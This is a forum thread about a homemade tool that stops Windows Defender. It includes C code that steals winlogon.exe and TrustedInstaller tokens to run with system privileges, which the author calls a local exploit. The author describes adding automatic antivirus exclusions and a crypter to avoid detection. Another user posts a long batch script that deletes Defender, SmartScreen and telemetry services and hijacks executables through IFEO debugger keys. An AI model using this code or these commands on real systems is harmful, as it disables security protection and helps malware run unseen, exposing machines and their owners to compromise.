Stopping and starting the Windows Defender service on demand.

Discussion in 'Application Software' started by wesmar, May 16, 2023.

  1. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    #1 wesmar, May 16, 2023
    Last edited: May 17, 2023

    Attached Files:

  2. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    #2 wesmar, May 17, 2023
    Last edited: May 17, 2023
    (OP)
    Partially fixed stopping and unloading more on-demand drivers as in the code headers file:

    Code:
    #pragma once
    #include <windows.h>
    #include <iostream>
    #include <tchar.h>
    
    using namespace std;
    
    #ifdef UNICODE
    #define get_username  get_usernameW
    #else
    #define get_username  get_usernameA
    #endif
    
    #define DEF_SERVICES_COUNT 7
    
    const PCTSTR DefenderServices[] = {
     
        TEXT("Sense"),
        TEXT("WdBoot"),
        TEXT("WdFilter"),
        TEXT("Wscsvc"),
        TEXT("WinDefend"),
        TEXT("WdNisSvc"),
        TEXT("WdNisDrv"),
    };
    
    wstring get_usernameW();
    string get_usernameA();
    BOOL StopDefenderService();
    int GetProcessByName(PCTSTR name);
    I've read from the RFC that it's all services in Windows 11. There's no longer a need to click on start to stop the defender on a failed attempt. From the console, just invoke the program again, and from windows click the stop button. I'll integrate all the files when I'm done. For now, still a testing phase and many interesting conclusions.
    I attach a fixed, useful, but still not final version.... In summary, all you need to do is replace the StopDefender.exe file
     

    Attached Files:

  3. ohenry

    ohenry MDL Senior Member

    Aug 10, 2009
    421
    250
    10
    Eset really doesn't like cmdt. He doesn't object to Nsudo, but cmdt he doesn't like.
     
  4. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    The code contained in cmdt.c contains three functions that perform various actions related to Windows processes and services. Below is a general description of how each of them works:

    Spoofing_System: This function attempts to impersonate system-level permissions. First, it tries to set certain permissions ("SeDebugPrivilege" and "SeImpersonatePrivilege"), and then obtains the PID of the "winlogon.exe" process. It then opens this process, retrieves its token, duplicates it, and finally impersonates the logged-in user using this token. Such techniques are used in software exploits and malicious code, as impersonating system-level processes can potentially give the code top-level privileges.

    Start_TI_Service: This function attempts to start the "TrustedInstaller" service. It first opens the service control manager and then opens the "TrustedInstaller" service. Then it checks the current state of the service. If the service is stopped, it tries to start it. If the service is in a waiting state, it waits for the current operation to finish. If the service is already running, it simply returns its PID. The function handles errors at each stage and returns the corresponding error codes.

    PS_Create_As_TI: This function creates a new process using the "TrustedInstaller" service token. This allows the new process to run with the same permissions as the "TrustedInstaller" service. The function first sets the specified permissions and then opens the process with the specified PID (the PID of the "TrustedInstaller" service, which should be returned by the Start_TI_Service function). It then duplicates the process token and uses it to create a new process.

    In general, this code performs operations that are used for privilege escalation - it tries to obtain higher-level privileges by impersonating system-level processes or the "TrustedInstaller" service. Improper use of such techniques can lead to security vulnerabilities or breaches. That's why Eset warns!

    Code:
    void Spoofing_System()
    {
        Set_Permission(L"SeDebugPrivilege");
        Set_Permission(L"SeImpersonatePrivilege");
    
        auto systemPid = Get_PID_by_Name(L"winlogon.exe");
        HANDLE hSystemProcess;
        if ((hSystemProcess = OpenProcess(
            PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION,
            FALSE,
            systemPid)) == NULL)
        {
            return -1;
        }
    
        HANDLE hSystemToken;
        if (!OpenProcessToken(
            hSystemProcess,
            MAXIMUM_ALLOWED,
            &hSystemToken))
        {
            CloseHandle(hSystemProcess);
            return GetLastError();
        }
    
        HANDLE hDupToken;
        SECURITY_ATTRIBUTES tokenAttributes;
        tokenAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
        tokenAttributes.lpSecurityDescriptor = NULL;
        tokenAttributes.bInheritHandle = FALSE;
        if (!DuplicateTokenEx(
            hSystemToken,
            MAXIMUM_ALLOWED,
            &tokenAttributes,
            SecurityImpersonation,
            TokenImpersonation,
            &hDupToken))
        {
            CloseHandle(hSystemToken);
            return GetLastError();
        }
    
        if (!ImpersonateLoggedOnUser(hDupToken))
        {
            CloseHandle(hDupToken);
            CloseHandle(hSystemToken);
            return GetLastError();
        }
    
        CloseHandle(hDupToken);
        CloseHandle(hSystemToken);
    }
    
    DWORD Start_TI_Service()
    {
        SC_HANDLE hSCManager;
        if ((hSCManager = OpenSCManagerW(
            NULL,
            SERVICES_ACTIVE_DATABASE,
            GENERIC_EXECUTE)) == NULL)
        {
            return GetLastError();
        }
    
        SC_HANDLE hService;
        if ((hService = OpenServiceW(
            hSCManager,
            L"TrustedInstaller",
            GENERIC_READ | GENERIC_EXECUTE)) == NULL)
        {
            CloseServiceHandle(hSCManager);
            return GetLastError();
        }
    
        SERVICE_STATUS_PROCESS statusBuffer;
        DWORD bytesNeeded;
        while (QueryServiceStatusEx(
            hService,
            SC_STATUS_PROCESS_INFO,
            (LPBYTE)&statusBuffer,
            sizeof(SERVICE_STATUS_PROCESS),
            &bytesNeeded))
        {
            if (statusBuffer.dwCurrentState == SERVICE_STOPPED)
            {
                if (!StartServiceW(hService, 0, NULL))
                {
                    CloseServiceHandle(hService);
                    CloseServiceHandle(hSCManager);
                    return GetLastError();
                }
            }
            if (statusBuffer.dwCurrentState == SERVICE_START_PENDING ||
                statusBuffer.dwCurrentState == SERVICE_STOP_PENDING)
            {
                Sleep(statusBuffer.dwWaitHint);
                continue;
            }
            if (statusBuffer.dwCurrentState == SERVICE_RUNNING)
            {
                CloseServiceHandle(hService);
                CloseServiceHandle(hSCManager);
                return statusBuffer.dwProcessId;
            }
        }
        CloseServiceHandle(hService);
        CloseServiceHandle(hSCManager);
        return GetLastError();
    }
    
    
    void PS_Create_As_TI(DWORD pid, wchar_t* commandLine)
    {
        Set_Permission(L"SeDebugPrivilege");
        Set_Permission(L"SeImpersonatePrivilege");
        Spoofing_System();
    
        HANDLE hTIProcess;
        if ((hTIProcess = OpenProcess(
            PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION,
            FALSE,
            pid)) == NULL)
        {
            return GetLastError();
        }
    
        HANDLE hTIToken;
        if (!OpenProcessToken(
            hTIProcess,
            MAXIMUM_ALLOWED,
            &hTIToken))
        {
            CloseHandle(hTIProcess);
            return GetLastError();
        }
    
        HANDLE hDupToken;
        SECURITY_ATTRIBUTES tokenAttributes;
        tokenAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
        tokenAttributes.lpSecurityDescriptor = NULL;
        tokenAttributes.bInheritHandle = FALSE;
        if (!DuplicateTokenEx(
            hTIToken,
            MAXIMUM_ALLOWED,
            &tokenAttributes,
            SecurityImpersonation,
            TokenImpersonation,
            &hDupToken))
        {
            CloseHandle(hTIToken);
            return GetLastError();
        }
    
        STARTUPINFOW startupInfo;
        ZeroMemory(&startupInfo, sizeof(STARTUPINFOW));
        startupInfo.lpDesktop = L"Winsta0\\Default";
        PROCESS_INFORMATION processInfo;
        ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));
        if (!CreateProcessWithTokenW(
            hDupToken,
            LOGON_WITH_PROFILE,
            NULL,
            commandLine,
            CREATE_UNICODE_ENVIRONMENT,
            NULL,
            NULL,
            &startupInfo,
            &processInfo))
        {
            return GetLastError();
        }
    }
    
     
  5. user469

    user469 MDL Member

    Oct 23, 2015
    121
    13
    10
    I will try it soon , i'm hating windows defender on win 10 putting some of my file in quarantine , just to name one nirsoft produkey.
    Just a question if i understand correctly, if i disable/stop the service on a pc(hdd) will be disabled forever until i re enable/start it ?
    Even if i put the same hdd on another pc ?
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. vladnil

    vladnil MDL Senior Member

    Jan 19, 2019
    462
    316
    10
    #6 vladnil, May 17, 2023
    Last edited: May 17, 2023
    Described dozens of times on the removal of the defender.
    Simply Delete Defender folder and in the autoloader delete download links that are already not working.

    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
    reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f
    reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f
    install_wim_tweak /o /c Windows-Defender /r
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f

    sc delete DiagTrack
    sc delete dmwappushservice
    sc delete WerSvc
    sc delete OneSyncSvc
    sc delete MessagingService
    sc delete wercplsupport
    sc delete PcaSvc
    sc config wlidsvc start=demand
    sc delete wisvc
    sc delete RetailDemo
    sc delete diagsvc
    sc delete shpamsvc
    sc delete TermService
    sc delete UmRdpService
    sc delete SessionEnv
    sc delete TroubleshootingSvc
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "wscsvc" ^| find /i "wscsvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "OneSyncSvc" ^| find /i "OneSyncSvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "MessagingService" ^| find /i "MessagingService"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PimIndexMaintenanceSvc" ^| find /i "PimIndexMaintenanceSvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UserDataSvc" ^| find /i "UserDataSvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" ^| find /i "UnistoreSvc"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "BcastDVRUserService" ^| find /i "BcastDVRUserService"') do (reg delete %I /f)
    for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "Sgrmbroker" ^| find /i "Sgrmbroker"') do (reg delete %I /f)
    sc delete diagnosticshub.standardcollector.service
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d 0 /f
    reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /f
    reg add "HKLM\SYSTEM\ControlSet001\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v Start /t REG_DWORD /d 0 /f
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v AITEnable /t REG_DWORD /d 0 /f
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableInventory /t REG_DWORD /d 1 /f
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisablePCA /t REG_DWORD /d 1 /f
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableUAR /t REG_DWORD /d 1 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d 0 /f
    reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRecentDocsHistory" /t REG_DWORD /d 1 /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeviceCensus.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f

    schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /disable
    schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /disable
    schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable
    schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable
    schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /disable
    schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /disable
    schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable
    schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable
    schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable
    schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /disable
    schtasks /Change /TN "Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable
    schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /disable
    schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /disable
    schtasks /Change /TN "Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable
    schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /disable
    schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /disable
    schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyUpload" /disable
    schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable
    schtasks /Change /TN "Microsoft\Windows\WindowsUpdate\Automatic App Update" /disable
    schtasks /Change /TN "Microsoft\Windows\License Manager\TempSignedLicenseExchange" /disable
    schtasks /Change /TN "Microsoft\Windows\Clip\License Validation" /disable
    schtasks /Change /TN "\Microsoft\Windows\ApplicationData\DsSvcCleanup" /disable
    schtasks /Change /TN "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable
    schtasks /Change /TN "\Microsoft\Windows\PushToInstall\LoginCheck" /disable
    schtasks /Change /TN "\Microsoft\Windows\PushToInstall\Registration" /disable
    schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable
    schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask" /disable
    schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyRefreshTask" /disable
    schtasks /Change /TN "\Microsoft\Windows\Subscription\EnableLicenseAcquisition" /disable
    schtasks /Change /TN "\Microsoft\Windows\Subscription\LicenseAcquisition" /disable
    schtasks /Change /TN "\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /disable
    schtasks /Change /TN "\Microsoft\Windows\Diagnosis\Scheduled" /disable
    schtasks /Change /TN "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable
    del /F /Q "C:\Windows\System32\Tasks\Microsoft\Windows\SettingSync\*"
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  7. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    I don't know if you all read the article. I tested DefCon and nothing has changed. Tamper Protection must be turned off. In my case it doesn't have to because why should it? I can make an option to make the program work in service mode and permanently disable Defender. However, this was not the concept. From the beginning I created two versions, where the console version is the most important because it allows, despite numerous restrictions, having administrator rights on a remote machine in the network to disable Defender (and more). Convenience for administrators of server versions, etc.. This program is actually a local exploit that impersonates trusted Microsoft services/processes. I know more or less how the next systems will turn out. If the Tamper Protection option becomes unmovable with the SecureBot flag - you have a problem. And I'm working on a decent installer that bypasses first run protection and exception creation. If I succeed I will put it up. The disabling option is a much-talked-about topic, and there is no need to fry another thread on it. The option to stop this type of service is another tale.

    Those who are well acquainted with psexec tools from the pstools stable know what powers this program has



    upload_2023-5-17_23-7-25.png
     
  8. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    #8 wesmar, May 19, 2023
    Last edited: May 19, 2023
    (OP)
    Released version 1.03
    Added automatic exception insertion into trusted programs. Regardless of file name and location. Passes the Tamper Protection Test - nothing needs to be changed. Version 1.04 will get a non-standard PE-crypter to make the program as undetectable as possible. For x64 version, the program is downloaded from the x64 folder
    Best regards, Marek
    P.S - multilingual installer on YT
    P.S. 2 - If one starts with user rights, the new Gui (StopDefenderGui.zip) will ask for an administrator, otherwise restarting the service would not be possible
     

    Attached Files:

  9. Dark Dinosaur

    Dark Dinosaur X Æ A-12

    Feb 2, 2011
    3,702
    5,105
    120
    I am still not able to understand
    if I open cmd with nsudo[*] and try to execute such a command
    kill service WinDefend bla bla ... it will fail
    what did you do to make it succeed?

    [*] NSudoLC.exe -U:T -P:E

    upload_2023-5-19_21-14-56.png

    upload_2023-5-19_21-14-47.png
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  10. wesmar

    wesmar MDL Novice

    Apr 1, 2012
    25
    55
    0
    Stopping or modifying Windows Defender requires system-level permissions, which are reserved for the TrustedInstaller account. But in Windows 10/11 if you impersonate TrustedInstaller, you have to push through other security layers that prevent such actions.

    Mandatory Integrity Control (MIC) is one such layer that pigeonholes objects (such as files or processes) into different integrity levels (low, medium, high, system), thus limiting interactions between them.

    Discretionary Access Control (DAC) is another layer of security that allows the owner of an object to decide who has access to it. This control is more granular and allows you to specify precisely which user accounts and groups have access to specific objects and what operations they can perform on them.

    In Windows 11, Microsoft also used techniques such as Control Flow Guard (CFG), which prevents attacks that modify a program's control flow, and Device Guard, which restricts the system to run only trusted software.

    The system for writing such an exploit gets heavily complicated, and is difficult to circumvent, just impersonating TrustedInstaller is not enough

    The code I've shown is an example of how to get the privileges of a Windows user who has the ability to stop the Windows Defender service. The program does this by manipulating process security tokens.

    The main steps of this code are:

    Using the ImpersonateProcessTokenByName() function to find and pretend the winlogon.exe system process has high privileges, and ImpersonateLoggedOnUser() allows the current thread to operate from the winlogon.exe perspective.

    Call ImpersonateProcessTokenByName() again, but this time to pretend to be the lsass.exe process. lsass.exe is the system process responsible for system security, including user authorization and authentication.

    Using the CreateTokenWinDefend() function to create a new token that authenticates the process as having the privileges of the "WinDefend" and "TrustedInstaller" services. This is crucial, because these services have permissions to stop the Windows Defender service.

    Impersonate using the token created in the previous step via ImpersonateLoggedOnUser(). At this point, the current process is running from the perspective of the "WinDefend" and "TrustedInstaller" services.

    Stopping the Windows Defender service behind the StopDefenderService() function. This is possible thanks to the permissions that the program acquired in the previous steps.
    Now I think everything is clear :)
     
  11. thizito

    thizito MDL Novice

    Oct 23, 2017
    1
    0
    0
    i never posted on this forum, despite looking at it alot and from 2017 account.
    but thats the first time i saw someone really doing the job with excellence, gz
    sadly it is not long-term due to driver sign, you already done too much, but is there an possibility to not require an driver?
     
  12. cbsvitzer

    cbsvitzer MDL Member

    Feb 4, 2010
    199
    133
    10
    Please don't give virus creators good ideas :)
     
  13. Dark Dinosaur

    Dark Dinosaur X Æ A-12

    Feb 2, 2011
    3,702
    5,105
    120
    They can get this idea alone .. :p
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  14. ungoda

    ungoda MDL Novice

    Apr 13, 2017
    5
    2
    0
    Tested StopDefender.exe (SHA256 0105CA52020C18538D883EC4F11B04EE8488DE3C1414CFE0DFA130E89E8D4206) and it did work.
    The GUI always stated it was running but anyway.
    Before running the tool, I disabled the real time protection and the tamper protection in Windows Security Center.
    After using this tool I edited the group policy to disable Defender.
    After a restart it tells me Defender is not active and the process is also gone. Group policy was not reverted.

    Windows 10 IoT Enterprise LTSC Version 21H2

    Thank you
     
  15. alorsnon

    alorsnon MDL Novice

    Jul 7, 2010
    32
    8
    0
    it's ok with windows 10 but with windows 11 the message says success but the Windefend service is never stopped